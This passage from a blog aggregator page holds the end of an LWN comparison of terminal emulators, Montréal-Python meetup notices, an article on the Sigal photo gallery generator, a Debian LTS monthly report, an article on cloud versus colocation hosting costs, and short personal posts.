While the original VT100 terminal did not support colors, newer terminals usually did, but were often limited to a 256-color palette. For power users styling their terminals, shell prompts, or status bars in more elaborate ways, this can be a frustrating limitation. A Gist keeps track of which terminals have "true color" support. My tests also confirm that st, Alacritty, and the VTE-derived terminals I tested have excellent true color support. Other terminals, however, do not fare so well and actually fail to display even 256 colors. You can see below the difference between true color support in GNOME Terminal, st, and xterm, which still does a decent job at approximating the colors using its 256-color palette. Urxvt not only fails the test but even shows blinking characters instead of colors.
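A quick way to reproduce this kind of check yourself is to print a 24-bit gradient using standard SGR escape sequences; this is only a rough approximation of what the linked Gist tests:

import sys

# Truecolor smoke test: print a smooth 24-bit background gradient. Terminals
# limited to 256 colors show visible banding or ignore the sequence entirely.
for col in range(80):
    r = int(255 * col / 79)
    sys.stdout.write(f"\x1b[48;2;{r};{255 - r};128m ")
sys.stdout.write("\x1b[0m\n")           # reset attributes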

Some terminals also parse the text for URL patterns to make them clickable. This is the case for all VTE-derived terminals, while urxvt requires the matcher plugin to visit URLs through a mouse click or keyboard shortcut. Other terminals reviewed do not display URLs in any special way.

Finally, a new trend treats scrollback buffers as an optional feature. For example, st has no scrollback buffer at all, pointing people toward terminal multiplexers like tmux and GNU Screen in its FAQ. Alacritty also lacks scrollback buffers but will add support soon because there was "so much pushback on the scrollback support". Apart from those outliers, every terminal I could find supports scrollback buffers.

Preliminary conclusions

In the next article, we'll compare performance characteristics like memory usage, speed, and latency of the terminals. But we can already see that some terminals have serious drawbacks. For example, users dealing with RTL scripts on a regular basis may be interested in mlterm and pterm, as they seem to have better support for those scripts. Konsole gets away with a good score here as well. Users who do not normally work with RTL scripts will also be happy with the other terminal choices.

In terms of paste protection, urxvt stands alone above the rest with its special feature, which I find particularly convenient. Those looking for all the bells and whistles will probably head toward terminals like Konsole. Finally, it should be noted that the VTE library provides an excellent basis for terminals to provide true color support, URL detection, and so on. So at first glance, the default terminal provided by your favorite desktop environment might just fit the bill, but we'll reserve judgment until our look at performance in the next article.

This article first appeared in the Linux Weekly News.

Categories: External Blogs

Montréal-Python 70 - Atomic Zucchini

Montreal Python - Tue, 03/27/2018 - 23:00

It is with pleasure that we announce the presentations of our 70th meetup. Unexpected events forced us to postpone last month's meetup. But don't worry, we are back in force with a menu full of Python delights!

Thanks to Shopify for sponsoring this event by providing the venue and pizza!

Schedule
  • 6:00PM - Doors open
  • 6:30PM - Presentations
  • 7:30PM - Break
  • 7:45PM - Presentations
  • 9:00PM - End of the event
  • 9:15PM - Benelux
Presentations
SikuliX: automate everything you see with a single tool (Windows, Mac, Linux) - Dominik Seelos

SikuliX is an automation tool that lets us script (in Python 2.7) repetitive tasks with very little automation experience. SikuliX works by image recognition and can do anything a keyboard and mouse can (Windows, Mac, and Linux).

Automate All The Things with Home Assistant - Philippe Gauthier
Would you pass a junior data scientist interview? - Nicolas Coallier

A demonstration of the modules and the level of Python required to be hired as a junior data scientist in a company. We have an internal Python test that we give during interviews. I will go through the test, which contains the answers.

Modules covered: Pandas, NumPy, scikit-learn, BeautifulSoup, re... ML theory covered: classification, segmentation, LSTM, boosting. Other topics covered: scraping, NLP, data structures.

When

Monday, April 9th, 2018 at 6:00PM

Where

Shopify, 490 rue de la Gauchetière Montréal, Québec

Categories: External Blogs

Montréal-Python 70 - Call for speakers - Atomic Zucchini

Montreal Python - Tue, 03/13/2018 - 23:00

The next Montréal-Python will be happening between Easter and your next sugar shack trip!

As always, we are looking for speakers!

Submit your proposals (up to 30 minutes) at team@montrealpython.org or come join us on our Slack at http://slack.mtlpy.org/ if you would like to discuss it.

Cheers!

When

Monday, March 12th, 2018, 6:00PM-9:00PM

Where

TBD

Categories: External Blogs

Montréal-Python 70 is gonna be in April

Montreal Python - Fri, 03/09/2018 - 00:00

Hello,

Unfortunately, next Monday's meetup (March 12th) needs to be postponed to next month.

Please send us your talk propositions by email to: mtlpyteam@googlegroups.com

See you in April for MP70 Atomic Zucchini!

Categories: External Blogs

Easy photo galleries with Sigal

Anarcat - Tue, 03/06/2018 - 19:00

Sigal is a "simple static gallery generator" with a straightforward design, a nice feature set, and great themes. It was started as a toy project, but has nevertheless grown into a sizable and friendly community. After struggling with maintenance using half a dozen photo gallery projects along the way, I feel I have found a nice little gem that I am happy to share with LWN readers.

CMS vs. SSG

Sigal is part of a growing family of static site generators (SSG), software that generates web sites as static HTML files as opposed to more elaborate Content Management Systems (CMS) that generate HTML content on the fly. A CMS requires specialized server-side software that needs maintenance to keep up to date with security fixes. That software is always running and exposed on the network, whereas a site generated with an SSG is only a collection of never-changing files. This drastically reduces the attack surface as visitors do not (usually) interact with the software directly. Finally, web servers can deliver static content much faster than dynamic content, which means SSGs can offer better performance than a CMS.

Having contributed to a major PHP-based CMS for over a decade, I was glad to finally switch to an SSG (ikiwiki) for my own web site three years ago. My photo gallery, however, was still running on a CMS: after running the venerable Gallery software (in hibernation since 2014), then Coppermine, I ended up using Piwigo. But that required a PHP-enabled web server, which meant chasing an endless stream of security issues. While I did consider non-PHP alternatives like MediaGoblin, that seemed too complicated (requiring Celery, Paste, and PostgreSQL). Really, static site generators had me hooked and there was no turning back.

Initially, I didn't use Sigal, as I first stumbled upon PhotoFloat. It is the brainchild of Jason A. Donenfeld—the same person behind the pass password manager that we previously covered and the WireGuard virtual private network (VPN) as well. PhotoFloat is a small Python program that generates a static gallery running custom JavaScript code. I was enthusiastic about the project: I packaged it for Debian and published patches to implement RSS feeds and multiple gallery support. Unfortunately, patches from contributors would just sit on the mailing list without feedback for months which led to some users forking the project. Donenfeld was not happy with the result; he decried the new PHP dependency and claimed the fork introduced a directory traversal vulnerability. The fork now seems to be more active than the original and was renamed to MyPhotoShare. But at that point, I was already looking for alternatives and found out about Sigal when browsing a friend's photo gallery.

What is Sigal?

Sigal was created by a French software developer from Lyon, Simon Conseil. In an IRC interview, he said that he started working on Sigal as a "toy project to learn Python", as part of his work in Astrophysics data processing at the Very Large Telescope in Chile:

A few years ago, I was already working on astrophysics but with another language (IDL): proprietary, and expensive, like MATLAB. Python was getting used more widely, with the birth of Astropy. So wanting to learn Python, I started to contribute to Pelican, and had the idea to do the same for photo galleries. I was using Piwigo, and felt I didn't need the more dynamic parts (comments, stars, etc.). A static site is so much simpler with some JavaScript library to do most of the job. Add some glue to create the pages, and Sigal was born!

Before starting a new project from scratch, Conseil first looked for alternatives ("Gallerize, lazygal, and a few others") but couldn't find anything satisfactory. He wanted to reuse ideas from Pelican, for example the Jinja2 template engine for themes and the Blinker plugin system, so he started his own project.

Like other static gallery generators, Sigal parses a tree of images and generates thumbnails and HTML pages to show those images. Instead of deploying its own custom JavaScript application for browsing images in the browser, Sigal reuses existing applications like Galleria, PhotoSwipe, and Colorbox. Image metadata is parsed from Exif tags, but a Markdown-formatted text file can also be used to change image or album titles, description, and location. The latest 1.4 release can also read metadata from in-image IPTC tags. Sigal parses regular images using the Pillow library but can also read video files, which get converted to browser-readable video files through the ubiquitous FFmpeg. Sigal has good (if minimal) online documentation and, like any good Python program, can be installed with pip; I am working on packaging it for Debian.
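To give an idea of the workflow, a gallery is driven by a small sigal.conf.py file. The sketch below only shows a few obvious settings; the option names are assumptions from memory of the sample configuration and should be checked against the Sigal documentation before use.

# Minimal sigal.conf.py sketch; option names are assumptions and should be
# verified against the sample configuration shipped with Sigal.
source = 'pictures'          # directory tree containing the original images
title = 'My photo gallery'   # gallery title shown by the theme
theme = 'galleria'           # one of the bundled JavaScript browsing themes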

Plugins offer support for image or copyright watermarks. The adjust plugin also allows for minor image adjustments, although those apply to the whole gallery so it is unclear to me how useful that plugin really is. Even novice photographers would more likely make adjustments in a basic image editor like Shotwell, digiKam, or maybe even GIMP before trying to tweak images in a Python configuration file. Finally, another plugin provides a simple RSS feed, which is useful to allow users to keep track of the latest images published in the gallery.

Future plans and limitations

When I asked him about future plans, Conseil said he had "no roadmap":

For me Sigal has been doing its job for a long time now, but the cool thing is that people find it useful and contribute. So my only wish is that this continues and to help the project live for and by its community, which is slowly growing.

Following this lead, I submitted patches and ideas of my own to the project while working on this article. The first shortcoming I have found with Sigal is the lack of access control. A photo gallery is either private or world-readable; there is no way to restrict access to only some albums or photos. I found a way, however, to implement folder password protection using the Basic authentication type for the Apache web server, which I documented in an FAQ entry. It's a little clunky as it uses password files managed through the old htpasswd command. It also means using passwords and, in my usability tests, some family members had trouble typing my weird randomly generated passwords on their tablets. I would have preferred to find a way to use URL-based authentication, with an unguessable one-time link, but I haven't found an easy way to do this in the web server. It can be done by picking a random name for the entire gallery, but not for specific folders, because those get leaked by Sigal. To protect certain pictures, they have to be in a separate gallery, which complicates maintenance.

Which brings us to gallery operation: to create a Sigal gallery, you need to create a configuration file and run the sigal build command. This is pretty simple but I think it can be made even simpler. I have proposed having a default configuration file so that creating a configuration file isn't required to make new galleries. I also looked at implementing a "daemon" mode that would watch a directory for changes and rebuild when new pictures show up. For now, I have settled on a quick hack based on the entr utility but there's talk of implementing the feature directly in the build command. Such improvements would enable mass hosting of photo galleries with minimal configuration. It would also make it easier to create password-less private galleries with unique, unguessable URLs.
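Until such a daemon mode exists, a crude polling loop can stand in for the entr hack mentioned above. This is only a sketch: the directory name and the polling interval are arbitrary assumptions, and it relies on the sigal build command already described.

import subprocess
import time
from pathlib import Path

# Rough, hypothetical stand-in for the entr-based hack: poll a picture
# directory (assumed to exist) and re-run "sigal build" whenever a file
# changes. Five seconds is an arbitrary interval.
WATCHED = Path("pictures")

def snapshot():
    return {p: p.stat().st_mtime for p in WATCHED.rglob("*") if p.is_file()}

last = snapshot()
while True:
    time.sleep(5)
    current = snapshot()
    if current != last:
        subprocess.run(["sigal", "build"], check=False)
        last = current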

Another patch I am working on is the stream plugin, which creates a new view of the gallery; instead of a folder-based interface, this shows the latest pictures published as a flat list. This is how commercial services like Instagram and Flickr work; even though you can tag pictures or group them by folder, they also offer a unified "stream" view of the latest entries in a gallery. As a demonstration of Sigal's clean design, I was able to quickly find my way in the code base to implement the required changes to the core libraries and unit tests, which are now waiting for review.

In closing, I have found Sigal to be a simple and elegant project. As it stands, it should be sufficient for basic galleries, but more demanding photographers and artists might need more elaborate solutions. Ratings, comments, and any form of interactivity will obviously be difficult to implement in Sigal; fans of those features should probably look at CMS solutions like Piwigo or the new Lychee project. But dynamic features are perhaps best kept to purpose-built free software like Discourse that embeds dynamic controls in static sites. In any case, for a system administrator tired of maintaining old software, the idea of having only static web sites to worry about is incredibly comforting. That simplicity and reliability has made Sigal a key tool in my amateur photographer toolbox.

A set of demos is available for readers who want to see more themes and play around with a real gallery.

This article first appeared in the Linux Weekly News.

Categories: External Blogs

February 2018 report: LTS, ...

Anarcat - Thu, 03/01/2018 - 12:07
Debian Long Term Support (LTS)

This is my monthly Debian LTS report. This month was exclusively dedicated to my frontdesk work. I actually forgot to do it the first week and had to play catchup during the weekend, so I brought up a discussion about how to avoid those problems in the future. I proposed an automated reminder system, but it turns out people found this was overkill. Instead, Chris Lamb suggested we simply send a ping to the next person in the list, which has proven useful the next time I was up. In the two weeks I was frontdesk, I ended up triaging the following notable packages:

  • isc-dhcp - remote code execution exploits - time to get rid of those root-level daemons?
  • simplesamlphp - under embargo, quite curious
  • golang - the return of remote code execution in go get (CVE-2018-6574, similar to CVE-2017-15041 and CVE-2018-7187) - ended up being marked as minor, unfortunately
  • systemd - CVE-2017-18078 was marked as unimportant as it was neutralized by kernel hardening and systemd was not really in use back in wheezy. Besides, CVE-2013-4392 was about similar functionality that was claimed to not be supported in wheezy. I did, however, propose to forcibly enable the kernel hardening through default sysctl configurations (Debian bug #889098) so that custom kernels would be covered by the protection in stable suites.

There were more minor triage work not mentioned here, those are just the juicy ones...

Speaking of juicy, the other thing I did during the month was to help with the documentation on the Meltdown and Spectre attacks on Intel CPUs. Much has been written about this and I won't do yet another summary. However, it seems that no one actually had written even semi-official documentation on the state of fixes in Debian, which led to many questions to the (LTS) security team(s). Ola Lundqvist did a first draft of a page detailing the current status, and I expanded on the page to add formatting and more details. The page is visible here:

https://wiki.debian.org/DebianSecurity/SpectreMeltdown

I'm still not fully happy with the results: we're missing some userland like Qemu and a timeline of fixes. In comparison, the Ubuntu page still looks much better in my opinion. But it's leagues ahead of what we had before, which was nothing... The next step for LTS is to backport the retpoline fixes back into a compiler. Roberto C. Sanchez is working on this, and the remaining question is whether we try to backport to GCC 4.7 or we backport GCC 4.9 itself into wheezy. In any case, it's a significant challenge and I'm glad I'm not the one dealing with such arcane code right now...

Other free software work

Not much to say this month, en vrac:

  • did the usual linkchecker maintenance
  • finally got my Prometheus node exporter directory size sample merged
  • added some docs updating the Dat project comparison with IPFS after investigating Dat. Turns out Dat's security guarantees aren't as good as I hoped...
  • reviewed some PRs in the Git-Mediawiki project
  • found what I consider to be a security issue in the Borg backup software, but it was disregarded as such by upstream. This ended up as a simple issue that I do not expect much from.
  • so I got more interested in the Restic community as well. I proposed a code of conduct to test the waters, but the feedback so far has been mixed, unfortunately.
  • started working on a streams page for the Sigal gallery. Expect an article about Sigal soon.
  • published undertime in Debian, which brought a slew of bug reports (and consequent fixes).
  • started looking at alternative GUIs because GTK2 is going away and I need to port two projects. I have a list of "hello world" programs in various frameworks now, but I am still not sure which one I'll use.
  • also worked on updating the Charybdis and Atheme-services packages with new co-maintainers (hi!)
  • worked with Darktable to try and render an exotic image out of my new camera. Might turn into a LWN article eventually as well.
  • started getting more involved in the local free software forum, a nice little community. In particular, i went to a "repair cafe" and wrote a full report on the experience there.

I'm trying to write more for LWN these days, so it's taking more time. I'm also trying to turn those reports into articles to help ramp up that rhythm, which means you'll need to subscribe to LWN to get the latest goods before the two-week exclusivity period ends.

Categories: External Blogs

The cost of hosting in the cloud

Anarcat - Wed, 02/28/2018 - 12:00

This is one part of my coverage of KubeCon Austin 2017. Other articles include:

Should we host in the cloud or on our own servers? This question was at the center of Dmytro Dyachuk's talk, given during KubeCon + CloudNativeCon last November. While many services simply launch in the cloud without the organizations behind them considering other options, large content-hosting services have actually moved back to their own data centers: Dropbox migrated in 2016 and Instagram in 2014. Because such transitions can be expensive and risky, understanding the economics of hosting is a critical part of launching a new service. Actual hosting costs are often misunderstood, or secret, so it is sometimes difficult to get the numbers right. In this article, we'll use Dyachuk's talk to try to answer the "million dollar question": "buy or rent?"

Computing the cost of compute

So how much does hosting cost these days? To answer that apparently trivial question, Dyachuk presented a detailed analysis made from a spreadsheet that compares the costs of "colocation" (running your own hardware in somebody else's data center) versus those of hosting in the cloud. For the latter, Dyachuk chose Amazon Web Services (AWS) as a standard, reminding the audience that "63% of Kubernetes deployments actually run off AWS". Dyachuk focused only on the cloud and colocation services, discarding the option of building your own data center as too complex and expensive. The question is whether it still makes sense to operate your own servers when, as Dyachuk explained, "CPU and memory have become a utility", a transition that Kubernetes is also helping push forward.

Another assumption of his talk is that server uptime isn't that critical anymore; there used to be a time when system administrators would proudly brandish multi-year uptime counters as a proof of server stability. As an example, Dyachuk performed a quick survey in the room and the record was an uptime of 5 years. In response, Dyachuk asked: "how many security patches were missed because of that uptime?" The answer was, of course "all of them". Kubernetes helps with security upgrades, in that it provides a self-healing mechanism to automatically re-provision failed services or rotate nodes when rebooting. This changes hardware designs; instead of building custom, application-specific machines, system administrators now deploy large, general-purpose servers that use virtualization technologies to host arbitrary applications in high-density clusters.

When presenting his calculations, Dyachuk explained that "pricing is complicated" and, indeed, his spreadsheet includes hundreds of parameters. However, after reviewing his numbers, I can say that the list is impressively exhaustive, covering server memory, disk, and bandwidth, but also backups, storage, staffing, and networking infrastructure.

For servers, he picked a Supermicro chassis with 224 cores and 512GB of memory from the first result of a Google search. Once amortized over an aggressive three-year rotation plan, the $25,000 machine ends up costing about $8,300 yearly. To compare with Amazon, he picked the m4.10xlarge instance as a commonly used standard, which currently offers 40 cores, 160GB of RAM, and 4Gbps of dedicated storage bandwidth. At the time he did his estimates, the going rate for such a server was $2 per hour or $17,000 per year. So, at first, the physical server looks like a much better deal: half the price and close to quadruple the capacity. But, of course, we also need to factor in networking, power usage, space rental, and staff costs. And this is where things get complicated.
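Before going further, here is a quick reproduction of the back-of-the-envelope arithmetic behind those two yearly figures; the inputs are the numbers quoted in the talk, everything else is plain division:

# Reproduce the yearly figures quoted above; inputs come from the talk.
server_price = 25_000            # Supermicro chassis, USD
amortization_years = 3
print(f"colocation server: ${server_price / amortization_years:,.0f}/year")  # ~$8,300

aws_hourly = 2.0                 # m4.10xlarge on-demand rate at the time, USD
print(f"m4.10xlarge:       ${aws_hourly * 24 * 365:,.0f}/year")              # ~$17,500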

First, colocation rates will vary a lot depending on location. While bandwidth costs are often much lower in large urban centers because of proximity to fast network links, real estate and power prices are often much higher. Bandwidth costs are now the main driver in hosting costs.

For the purpose of his calculation, Dyachuk picked a real-estate figure of $500 per standard cabinet (42U). His calculations yielded a monthly power cost of $4,200 for a full rack, at $0.50/kWh. Those rates seem rather high for my local data center, where that rate is closer to $350 for the cabinet and $0.12/kWh for power. Dyachuk took into account that power is usually not "metered billing", when you pay for the actual power usage, but "stepped billing" where you pay for a circuit with a (say) 25-amp breaker regardless of how much power you use in said circuit. This accounts for some of the discrepancy, but the estimate still seems rather too high to be accurate according to my calculations.
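The arithmetic behind that doubt is simple enough to spell out; this is only my own back-of-the-envelope check, reusing the rates already quoted above:

# What continuous draw does a $4,200 monthly bill imply at $0.50/kWh, and
# what would the same consumption cost at the local rates quoted above?
hours_per_month = 24 * 30
kwh_per_month = 4_200 / 0.50                  # ~8,400 kWh for the full rack
implied_kw = kwh_per_month / hours_per_month
print(f"implied continuous draw: {implied_kw:.1f} kW")      # ~11.7 kW

local_monthly = 350 + kwh_per_month * 0.12    # $350 cabinet plus $0.12/kWh
print(f"local-rate estimate: ${local_monthly:,.0f}/month")  # ~$1,360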

Then there's networking: all those machines need to connect to each other and to an uplink. This means finding a bandwidth provider, which Dyachuk pinned at a reasonable average cost of $1/Mbps. But the most expensive part is not the bandwidth; the cost of managing network infrastructure includes not only installing switches and connecting them, but also tracing misplaced wires, dealing with denial-of-service attacks, and so on. Cabling, a seemingly innocuous task, is actually the majority of hardware expenses in data centers, as previously reported. From networking, Dyachuk went on to detail the remaining cost estimates, including storage and backups, where the physical world is again cheaper than the cloud. All this is, of course, assuming that crafty system administrators can figure out how to glue all the hardware together into a meaningful package.

Which brings us to the sensitive question of staff costs; Dyachuk described those as "substantial". These costs are for the system and network administrators who are needed to buy, order, test, configure, and deploy everything. Evaluating those costs is subjective: for example, salaries will vary between different countries. He fixed the person yearly salary costs at $250,000 (counting overhead and an actual $150,000 salary) and accounted for three people on staff. Those costs may also vary with the colocation service; some will include remote hands and networking, but he assumed in his calculations that the costs would end up being roughly the same because providers will charge extra for those services.

Dyachuk also observed that staff costs are the majority of the expenses in a colocation environment: "hardware is cheaper, but requires a lot more people". In the cloud, it's the opposite; most of the costs consist of computation, storage, and bandwidth. Staff also introduce a human factor of instability in the equation: in a small team, there can be a lot of variability in ability levels. This means there is more uncertainty in colocation cost estimates.

In our discussions after the conference, Dyachuk pointed out a social aspect to consider: cloud providers are operating a virtual oligopoly. Dyachuk worries about the impact of Amazon's growing power over different markets:

A lot of businesses are in direct competition with Amazon. A fear of losing commercial secrets and being spied upon has not been confirmed by any incidents yet. But Walmart, for example, moved out of AWS and requested that its suppliers do the same.

Demand management

Once the extra costs described are factored in, colocation still would appear to be the cheaper option. But that doesn't take into account the question of capacity: a key feature of cloud providers is that they pool together large clusters of machines, which allow individual tenants to scale up their services quickly in response to demand spikes. Self-hosted servers need extra capacity to cover for future demand. That means paying for hardware that stays idle waiting for usage spikes, while cloud providers are free to re-provision those resources elsewhere.

Satisfying demand in the cloud is easy: allocate new instances automatically and pay the bill at the end of the month. In a colocation, provisioning is much slower and hardware must be systematically over-provisioned. Those extra resources might be used for preemptible batch jobs in certain cases, but workloads are often "transaction-oriented" or "realtime" which require extra resources to deal with spikes. So the "spike to average" ratio is an important metric to evaluate when making the decision between the cloud and colocation.

Cost reductions are possible by improving analytics to reduce over-provisioning. Kubernetes makes it easier to estimate demand; before containerized applications, estimates were per application, each with its margin of error. By pooling together all applications in a cluster, the problem is generalized and individual workloads balance out in aggregate, even if they fluctuate individually. Therefore Dyachuk recommends using the cloud when future growth cannot be forecast, to avoid the risk of under-provisioning. He also recommended "The Art of Capacity Planning" as a good forecasting resource; even though the book is old, the basic math hasn't changed so it is still useful.

The golden ratio

Colocation prices finally overshoot cloud prices after adding extra capacity and staff costs. In closing, Dyachuk identified the crossover point where colocation becomes cheaper at around $100,000 per month, or 150 Amazon m4.2xlarge instances, which can be seen in the graph below. Note that he picked a different instance type for the actual calculations: instead of the largest instance (m4.10xlarge), he chose the more commonly used m4.2xlarge instance. Because Amazon pricing scales linearly, the math works out to about the same once reserved instances, storage, load balancing, and other costs are taken into account.

He also added that the figure will change based on the workload; Amazon is more attractive with more CPU and less I/O. Inversely, I/O-heavy deployments can be a problem on Amazon; disk and network bandwidth are much more expensive in the cloud. For example, bandwidth can sometimes be more than triple what you can easily find in a data center.

Your mileage may vary; those numbers shouldn't be taken as an absolute. They are a baseline that needs to be tweaked according to your situation, workload and requirements. For some, Amazon will be cheaper, for others, colocation is still the best option.

He also emphasized that the graph stops at 500 instances; beyond that lies another "wall" of investment due to networking constraints. At around the equivalent of 2000-3000 Amazon instances, networking becomes a significant bottleneck and demands larger investments in networking equipment to upgrade internal bandwidth, which may make Amazon affordable again. It might also be that application design should shift to a multi-cluster setup, but that implies increases in staff costs.

Finally, we should note that some organizations simply cannot host in the cloud. In our discussions, Dyachuk specifically expressed concerns about Canada's government services moving to the cloud, for example: what is the impact on state sovereignty when confidential data about its citizens ends up in the hands of private contractors? So far, Canada's approach has been to only move "public data" to the cloud, but Dyachuk pointed out this already includes sensitive departments like correctional services.

In Dyachuk's model, the cloud offers significant cost reduction over traditional hosting in small clusters, at least until a deployment reaches a certain size. However, different workloads significantly change that model and can make colocation attractive again: I/O and bandwidth intensive services with well-planned growth rates are clear colocation candidates. His model is just a start; any project manager would be wise to make their own calculations to confirm the cloud really delivers the cost savings it promises. Furthermore, while Dyachuk wisely avoided political discussions surrounding the impact of hosting in the cloud, data ownership and sovereignty remain important considerations that shouldn't be overlooked.

A YouTube video and the slides [PDF] from Dyachuk's talk are available online.

This article first appeared in the Linux Weekly News, under the title "The true costs of hosting in the cloud".

Categories: External Blogs

Epic Lameness

Eric Dorland - Mon, 09/01/2008 - 17:26
SF.net now supports OpenID. Hooray! I'd like to make a comment on a thread about the RTL8187se chip I've got in my new MSI Wind. So I go to sign in with OpenID and instead of signing me in it prompts me to create an account with a name, username and password for the account. Huh? I just want to post to their forum, I don't want to create an account (at least not explicitly, if they want to do it behind the scenes fine). Isn't the point of OpenID to not have to create accounts and particularly not have to create new usernames and passwords to access websites? I'm not impressed.
Categories: External Blogs

Sentiment Sharing

Eric Dorland - Mon, 08/11/2008 - 23:28
Biella, I am from there and I do agree. If I was still living there I would try to form a team and make a bid. Simon even made noises about organizing a bid at DebConfs past. I wish he would :)

But a DebConf in New York would be almost as good.
Categories: External Blogs